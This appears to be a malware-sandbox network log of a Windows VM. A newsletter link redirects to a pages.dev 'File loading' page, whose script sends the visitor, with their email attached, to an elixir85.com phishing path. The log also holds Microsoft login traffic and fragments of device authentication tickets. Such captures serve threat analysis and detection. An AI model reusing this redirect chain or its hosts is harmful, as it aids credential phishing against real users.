                                                        Data Ascii: <?xml version="1.0" encoding="UTF-8"?><s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:ps="http://schemas.microsoft.com/Passport/SoapServices/PPCRL" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1
                                                        2024-07-03 19:06:38 UTC568INHTTP/1.1 200 OK
                                                        Cache-Control: no-store, no-cache
                                                        Pragma: no-cache
                                                        Content-Type: application/soap+xml; charset=utf-8
                                                        Expires: Wed, 03 Jul 2024 19:05:38 GMT
                                                        P3P: CP="DSP CUR OTPi IND OTRi ONL FIN"
                                                        Referrer-Policy: strict-origin-when-cross-origin
                                                        x-ms-route-info: C555_BAY
                                                        x-ms-request-id: ad50defc-0fc0-4fe5-8ca6-0ad2ab3f6394
                                                        PPServer: PPV: 30 H: PH1PEPF00011DAE V: 0
                                                        X-Content-Type-Options: nosniff
                                                        Strict-Transport-Security: max-age=31536000
                                                        X-XSS-Protection: 1; mode=block
                                                        Date: Wed, 03 Jul 2024 19:06:37 GMT
                                                        Connection: close
                                                        Content-Length: 1919
                                                        2024-07-03 19:06:38 UTC1919INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 20 3f 3e 3c 53 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 53 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31 2e 30 2e 78 73 64 22 20 78 6d 6c 6e 73 3a 77 73 75 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30
                                                        Data Ascii: <?xml version="1.0" encoding="utf-8" ?><S:Envelope xmlns:S="http://www.w3.org/2003/05/soap-envelope" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd" xmlns:wsu="http://docs.oasis-open.org/wss/2004/01/oasis-200


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        6192.168.2.549728104.18.69.404433748C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-07-03 19:06:37 UTC1850OUTGET /ls/click?upn=u001.DTQiLe1mLQCNek4IXPrb3cd8am3-2BtbSaRRShUhZCbhF1FE2NDum-2B9YeqhMivZ-2FcIJGKdOjfqgyCSTZimAiOiNKkJG3N5vgYBNDNlk5YkmOU2XPb-2FKTFlF-2Fc7jFH7Nb8Q0JW6uJclJabjCcGs0cWdzdydwDpcxzScPZQBex7SofyQj6MGdYzEG8hbxGGqYt2bpR0NjPAx6JIYz6GJiSrQNg-3D-3DNN1n_VW5ZEdFpCuXmC2nf4fwMfiBmdui0O95PSMmp4s-2F2oS3jvSHISWr6XQl8RtHpD7TWmHpRBlT8NsCamUZaroeFibjayeskXeuNnFhPFOon1-2FD6SmbcpIEUC7jghzzXsggajKIODB16RJEeGNz4SFHe6mT-2Bn59v08ju13fD9NtKJQcr97qiQNjiGiaoQJcvN3gUurUBqLZp9I4f9bNW54ZUVVCzpwaogbLaWcL9oScbt8r4Ku34t9zOqlF27gTqXVf6T2MbNMKkoCYnb-2BuL8kIZdyoRM3EFOIuktrG5gMH3OTa1K2klBhmxFOQ2d7plqd5asAi8Ofl9YcYOh-2FL4f45riCQtSdd7jru06EkHcBuJahi-2BD3xm-2F7PbjpIpmn-2Bu7KYdjQeOSKE-2FSiD6UNxc7JQNRWkdnK1RTC7eoEMZms82uCa8fJQIoMgqBt91NrcdZIDONaGhhpHXRhQ1VbYp5h6Cow-3D-3D HTTP/1.1
                                                        Host: link.mail.beehiiv.com
                                                        Connection: keep-alive
                                                        Upgrade-Insecure-Requests: 1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                        sec-ch-ua-mobile: ?0
                                                        sec-ch-ua-full-version: "117.0.5938.132"
                                                        sec-ch-ua-arch: "x86"
                                                        sec-ch-ua-platform: "Windows"
                                                        sec-ch-ua-platform-version: "10.0.0"
                                                        sec-ch-ua-model: ""
                                                        sec-ch-ua-bitness: "64"
                                                        sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"
                                                        Sec-Fetch-Site: none
                                                        Sec-Fetch-Mode: navigate
                                                        Sec-Fetch-User: ?1
                                                        Sec-Fetch-Dest: document
                                                        Accept-Encoding: gzip, deflate, br
                                                        Accept-Language: en-US,en;q=0.9
                                                        Cookie: __cf_bm=IQ0kDKqsds0puoNbwl0LyUop2u8_fh4BRK0xcf65ZTM-1720033597-1.0.1.1-Tcc3DGThDR1gfTg7hvqQjB7YpHod4J4GL.JzRTX.pG4CYA4UhSlW62sqlRLkzt.0xW_kV3MuTbqb6L17ejXJdg
                                                        2024-07-03 19:06:38 UTC408INHTTP/1.1 302 Found
                                                        Date: Wed, 03 Jul 2024 19:06:38 GMT
                                                        Content-Type: text/html; charset=utf-8
                                                        Transfer-Encoding: chunked
                                                        Connection: close
                                                        Location: https://ad4a82ff.fdfsfsfffsffffdfdffdfddfsrfe.pages.dev?utm_source=nohsins-newsletter.beehiiv.com&utm_medium=newsletter&utm_campaign=new-post
                                                        X-Robots-Tag: noindex, nofollow
                                                        CF-Cache-Status: DYNAMIC
                                                        Server: cloudflare
                                                        CF-RAY: 89d927637c76c336-EWR
                                                        2024-07-03 19:06:38 UTC178INData Raw: 61 63 0d 0a 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 61 64 34 61 38 32 66 66 2e 66 64 66 73 66 73 66 66 66 73 66 66 66 66 64 66 64 66 66 64 66 64 64 66 73 72 66 65 2e 70 61 67 65 73 2e 64 65 76 3f 75 74 6d 5f 73 6f 75 72 63 65 3d 6e 6f 68 73 69 6e 73 2d 6e 65 77 73 6c 65 74 74 65 72 2e 62 65 65 68 69 69 76 2e 63 6f 6d 26 61 6d 70 3b 75 74 6d 5f 6d 65 64 69 75 6d 3d 6e 65 77 73 6c 65 74 74 65 72 26 61 6d 70 3b 75 74 6d 5f 63 61 6d 70 61 69 67 6e 3d 6e 65 77 2d 70 6f 73 74 22 3e 46 6f 75 6e 64 3c 2f 61 3e 2e 0a 0a 0d 0a
                                                        Data Ascii: ac<a href="https://ad4a82ff.fdfsfsfffsffffdfdffdfddfsrfe.pages.dev?utm_source=nohsins-newsletter.beehiiv.com&amp;utm_medium=newsletter&amp;utm_campaign=new-post">Found</a>.
                                                        2024-07-03 19:06:38 UTC5INData Raw: 30 0d 0a 0d 0a
                                                        Data Ascii: 0


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        7192.168.2.549732172.66.45.74433748C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-07-03 19:06:38 UTC1048OUTGET /?utm_source=nohsins-newsletter.beehiiv.com&utm_medium=newsletter&utm_campaign=new-post HTTP/1.1
                                                        Host: ad4a82ff.fdfsfsfffsffffdfdffdfddfsrfe.pages.dev
                                                        Connection: keep-alive
                                                        Upgrade-Insecure-Requests: 1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                        Sec-Fetch-Site: none
                                                        Sec-Fetch-Mode: navigate
                                                        Sec-Fetch-User: ?1
                                                        Sec-Fetch-Dest: document
                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                        sec-ch-ua-mobile: ?0
                                                        sec-ch-ua-full-version: "117.0.5938.132"
                                                        sec-ch-ua-arch: "x86"
                                                        sec-ch-ua-platform: "Windows"
                                                        sec-ch-ua-platform-version: "10.0.0"
                                                        sec-ch-ua-model: ""
                                                        sec-ch-ua-bitness: "64"
                                                        sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"
                                                        Accept-Encoding: gzip, deflate, br
                                                        Accept-Language: en-US,en;q=0.9
                                                        2024-07-03 19:06:38 UTC795INHTTP/1.1 200 OK
                                                        Date: Wed, 03 Jul 2024 19:06:38 GMT
                                                        Content-Type: text/html; charset=utf-8
                                                        Transfer-Encoding: chunked
                                                        Connection: close
                                                        Access-Control-Allow-Origin: *
                                                        Cache-Control: public, max-age=0, must-revalidate
                                                        referrer-policy: strict-origin-when-cross-origin
                                                        x-content-type-options: nosniff
                                                        x-robots-tag: noindex
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zg6caGS1Ge%2FwSkNPUNMH2dFih00I%2BnWP%2B4LFq0x7UzCFsaeGTc1Fr%2FvqQCRm8VzkVNKre%2BkA8Q0rb6QZ2eF6Ug63eVXuGOFjbq5rq6EG%2F8mpJW6axYQP6oEuqdy5nS9h%2FmbBpz84Tcj1go8sK%2BV6GxxES0WBUOGPHMW%2B2g8OQ6Po5w%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 89d92767e9cc7cff-EWR
                                                        alt-svc: h3=":443"; ma=86400
                                                        2024-07-03 19:06:38 UTC1369INData Raw: 35 62 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 69 6c 65 20 6c 6f 61 64 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 3e 0a 20 20 20 20 20 20 20 20 2f 2f 20 46 75 6e 63 74 69 6f 6e 20 74 6f 20 67 65 74 20 74 68 65 20 76 61 6c 75 65 20 6f 66 20 61 20 70 61 72 61 6d 65 74 65 72 20 66 72 6f 6d 20 74 68 65 20 55 52
                                                        Data Ascii: 5bd<!DOCTYPE html><html lang="en"><head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>File loading</title> <script> // Function to get the value of a parameter from the UR
                                                        2024-07-03 19:06:38 UTC107INData Raw: 57 41 69 2e 65 6c 69 78 69 72 38 35 2e 63 6f 6d 2f 52 66 57 41 69 2f 23 58 27 20 2b 20 65 6d 61 69 6c 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 2c 20 31 30 30 30 29 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 3c 2f 73 63 72 69 70 74 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 0d 0a
                                                        Data Ascii: WAi.elixir85.com/RfWAi/#X' + email; }, 1000); } </script></head><body></html>
                                                        2024-07-03 19:06:38 UTC5INData Raw: 30 0d 0a 0d 0a
                                                        Data Ascii: 0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8192.168.2.54973320.190.159.4443
                                                        TimestampBytes transferredDirectionData
                                                        2024-07-03 19:06:39 UTC422OUTPOST /RST2.srf HTTP/1.0
                                                        Connection: Keep-Alive
                                                        Content-Type: application/soap+xml
                                                        Accept: */*
                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 24.10.0.19045.0.0; IDCRL-cfg 16.000.29743.00; App svchost.exe, 10.0.19041.1806, {DF60E2DF-88AD-4526-AE21-83D130EF0F68})
                                                        Content-Length: 4775
                                                        Host: login.live.com
                                                        2024-07-03 19:06:39 UTC4775OUTData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 70 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 50 61 73 73 70 6f 72 74 2f 53 6f 61 70 53 65 72 76 69 63 65 73 2f 50 50 43 52 4c 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31
                                                        Data Ascii: <?xml version="1.0" encoding="UTF-8"?><s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:ps="http://schemas.microsoft.com/Passport/SoapServices/PPCRL" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1
                                                        2024-07-03 19:06:39 UTC654INHTTP/1.1 200 OK
                                                        Cache-Control: no-store, no-cache
                                                        Pragma: no-cache
                                                        Content-Type: application/soap+xml; charset=utf-8
                                                        Expires: Wed, 03 Jul 2024 19:05:39 GMT
                                                        P3P: CP="DSP CUR OTPi IND OTRi ONL FIN"
                                                        FdrTelemetry: &481=21&59=33&213=10&215=0&315=1&215=0&315=1&214=56&288=16.0.30275.14
                                                        Referrer-Policy: strict-origin-when-cross-origin
                                                        x-ms-route-info: C561_BAY
                                                        x-ms-request-id: 8121cfb7-f3f2-4f0c-aa1a-753f4dc69438
                                                        PPServer: PPV: 30 H: PH1PEPF00012035 V: 0
                                                        X-Content-Type-Options: nosniff
                                                        Strict-Transport-Security: max-age=31536000
                                                        X-XSS-Protection: 1; mode=block
                                                        Date: Wed, 03 Jul 2024 19:06:39 GMT
                                                        Connection: close
                                                        Content-Length: 11370
                                                        2024-07-03 19:06:39 UTC11370INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 20 3f 3e 3c 53 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 53 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31 2e 30 2e 78 73 64 22 20 78 6d 6c 6e 73 3a 77 73 75 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30
                                                        Data Ascii: <?xml version="1.0" encoding="utf-8" ?><S:Envelope xmlns:S="http://www.w3.org/2003/05/soap-envelope" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd" xmlns:wsu="http://docs.oasis-open.org/wss/2004/01/oasis-200


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9192.168.2.54973540.115.3.253443
                                                        TimestampBytes transferredDirectionData
                                                        2024-07-03 19:06:39 UTC71OUTData Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 35 0d 0a 4d 53 2d 43 56 3a 20 30 4b 47 71 45 4c 77 65 6b 6b 71 5a 51 51 33 46 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 65 33 32 35 38 63 66 61 63 39 62 37 32 37 31 38 0d 0a 0d 0a
                                                        Data Ascii: CNT 1 CON 305MS-CV: 0KGqELwekkqZQQ3F.1Context: e3258cfac9b72718
                                                        2024-07-03 19:06:39 UTC249OUTData Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e
                                                        Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
                                                        2024-07-03 19:06:39 UTC1076OUTData Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 35 33 0d 0a 4d 53 2d 43 56 3a 20 30 4b 47 71 45 4c 77 65 6b 6b 71 5a 51 51 33 46 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 65 33 32 35 38 63 66 61 63 39 62 37 32 37 31 38 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 77 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 64 77 5a 2b 79 69 74 69 2f 4c 51 49 39 4b 42 37 74 65 43 72 7a 45 50 45 6a 71 59 55 6c 74 79 4f 56 56 74 2b 45 6e 7a 4d 61 58 42 34 68 31 51 7a 6c 58 6b 54 72 57 71 41 63 5a 37 57 6e 6c 4f 56 6b 68 38 63 6c 57 72 56 6b 51 64 6c 2b 4f 45 2f 72 35 30 67 74 6b 68 58 6f 6d 46 53 38 4c 62 6d 45 6d 5a 64 75 62 34 5a 63 37 65 44 65
                                                        Data Ascii: ATH 2 CON\DEVICE 1053MS-CV: 0KGqELwekkqZQQ3F.2Context: e3258cfac9b72718<device><compact-ticket>t=EwCwAupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAdwZ+yiti/LQI9KB7teCrzEPEjqYUltyOVVt+EnzMaXB4h1QzlXkTrWqAcZ7WnlOVkh8clWrVkQdl+OE/r50gtkhXomFS8LbmEmZdub4Zc7eDe
                                                        2024-07-03 19:06:39 UTC74OUTData Raw: 42 4e 44 20 33 20 43 4f 4e 5c 51 4f 53 20 35 36 0d 0a 4d 53 2d 43 56 3a 20 30 4b 47 71 45 4c 77 65 6b 6b 71 5a 51 51 33 46 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 65 33 32 35 38 63 66 61 63 39 62 37 32 37 31 38 0d 0a 0d 0a
                                                        Data Ascii: BND 3 CON\QOS 56MS-CV: 0KGqELwekkqZQQ3F.3Context: e3258cfac9b72718
                                                        2024-07-03 19:06:39 UTC14INData Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a
                                                        Data Ascii: 202 1 CON 58
                                                        2024-07-03 19:06:39 UTC58INData Raw: 4d 53 2d 43 56 3a 20 6c 4b 51 36 47 6a 53 38 70 30 2b 74 64 4c 6b 47 51 31 67 4c 57 77 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e
                                                        Data Ascii: MS-CV: lKQ6GjS8p0+tdLkGQ1gLWw.0Payload parsing failed.


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10192.168.2.54973440.115.3.253443
                                                        TimestampBytes transferredDirectionData
                                                        2024-07-03 19:06:39 UTC71OUTData Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 35 0d 0a 4d 53 2d 43 56 3a 20 54 35 49 39 6a 68 6a 73 71 30 61 42 33 76 75 59 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 34 36 63 64 36 31 38 64 62 64 33 37 36 33 62 31 0d 0a 0d 0a
                                                        Data Ascii: CNT 1 CON 305MS-CV: T5I9jhjsq0aB3vuY.1Context: 46cd618dbd3763b1
                                                        2024-07-03 19:06:39 UTC249OUTData Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e
                                                        Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
                                                        2024-07-03 19:06:39 UTC1076OUTData Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 35 33 0d 0a 4d 53 2d 43 56 3a 20 54 35 49 39 6a 68 6a 73 71 30 61 42 33 76 75 59 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 34 36 63 64 36 31 38 64 62 64 33 37 36 33 62 31 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 77 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 59 77 65 64 71 39 69 6b 77 4f 2b 42 6c 6f 57 32 4a 71 59 70 46 78 73 2f 43 74 57 6f 35 48 58 48 5a 6d 59 53 39 65 66 6e 56 2f 67 55 34 4d 33 73 4c 4d 6c 55 42 79 38 6d 2b 41 63 35 64 32 50 34 53 4b 66 38 4d 53 57 6f 2b 59 30 5a 55 57 41 48 56 4a 79 44 61 2f 76 5a 6b 61 55 52 44 6a 77 71 51 77 68 4c 42 78 44 61 34 34 49 77 6a
                                                        Data Ascii: ATH 2 CON\DEVICE 1053MS-CV: T5I9jhjsq0aB3vuY.2Context: 46cd618dbd3763b1<device><compact-ticket>t=EwCwAupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAYwedq9ikwO+BloW2JqYpFxs/CtWo5HXHZmYS9efnV/gU4M3sLMlUBy8m+Ac5d2P4SKf8MSWo+Y0ZUWAHVJyDa/vZkaURDjwqQwhLBxDa44Iwj
                                                        2024-07-03 19:06:39 UTC218OUTData Raw: 42 4e 44 20 33 20 43 4f 4e 5c 57 4e 53 20 30 20 31 39 37 0d 0a 4d 53 2d 43 56 3a 20 54 35 49 39 6a 68 6a 73 71 30 61 42 33 76 75 59 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 34 36 63 64 36 31 38 64 62 64 33 37 36 33 62 31 0d 0a 0d 0a 3c 77 6e 73 3e 3c 76 65 72 3e 31 3c 2f 76 65 72 3e 3c 63 6c 69 65 6e 74 3e 3c 6e 61 6d 65 3e 57 50 4e 3c 2f 6e 61 6d 65 3e 3c 76 65 72 3e 31 2e 30 3c 2f 76 65 72 3e 3c 2f 63 6c 69 65 6e 74 3e 3c 6f 70 74 69 6f 6e 73 3e 3c 70 77 72 6d 6f 64 65 20 6d 6f 64 65 3d 22 30 22 3e 3c 2f 70 77 72 6d 6f 64 65 3e 3c 2f 6f 70 74 69 6f 6e 73 3e 3c 6c 61 73 74 4d 73 67 49 64 3e 30 3c 2f 6c 61 73 74 4d 73 67 49 64 3e 3c 2f 77 6e 73 3e
                                                        Data Ascii: BND 3 CON\WNS 0 197MS-CV: T5I9jhjsq0aB3vuY.3Context: 46cd618dbd3763b1<wns><ver>1</ver><client><name>WPN</name><ver>1.0</ver></client><options><pwrmode mode="0"></pwrmode></options><lastMsgId>0</lastMsgId></wns>
                                                        2024-07-03 19:06:39 UTC14INData Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a
                                                        Data Ascii: 202 1 CON 58
                                                        2024-07-03 19:06:39 UTC58INData Raw: 4d 53 2d 43 56 3a 20 67 2b 65 78 30 33 30 65 65 30 79 4d 34 79 41 6e 30 6f 30 38 4d 67 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e
                                                        Data Ascii: MS-CV: g+ex030ee0yM4yAn0o08Mg.0Payload parsing failed.


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        11192.168.2.549736172.66.45.74433748C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-07-03 19:06:39 UTC736OUTGET /favicon.ico HTTP/1.1
                                                        Host: ad4a82ff.fdfsfsfffsffffdfdffdfddfsrfe.pages.dev
                                                        Connection: keep-alive
                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                        sec-ch-ua-mobile: ?0
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                        sec-ch-ua-platform: "Windows"
                                                        Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                        Sec-Fetch-Site: same-origin
                                                        Sec-Fetch-Mode: no-cors
                                                        Sec-Fetch-Dest: image
                                                        Referer: https://ad4a82ff.fdfsfsfffsffffdfdffdfddfsrfe.pages.dev/?utm_source=nohsins-newsletter.beehiiv.com&utm_medium=newsletter&utm_campaign=new-post
                                                        Accept-Encoding: gzip, deflate, br
                                                        Accept-Language: en-US,en;q=0.9
                                                        2024-07-03 19:06:39 UTC781INHTTP/1.1 200 OK
                                                        Date: Wed, 03 Jul 2024 19:06:39 GMT
                                                        Content-Type: text/html; charset=utf-8
                                                        Transfer-Encoding: chunked
                                                        Connection: close
                                                        Access-Control-Allow-Origin: *
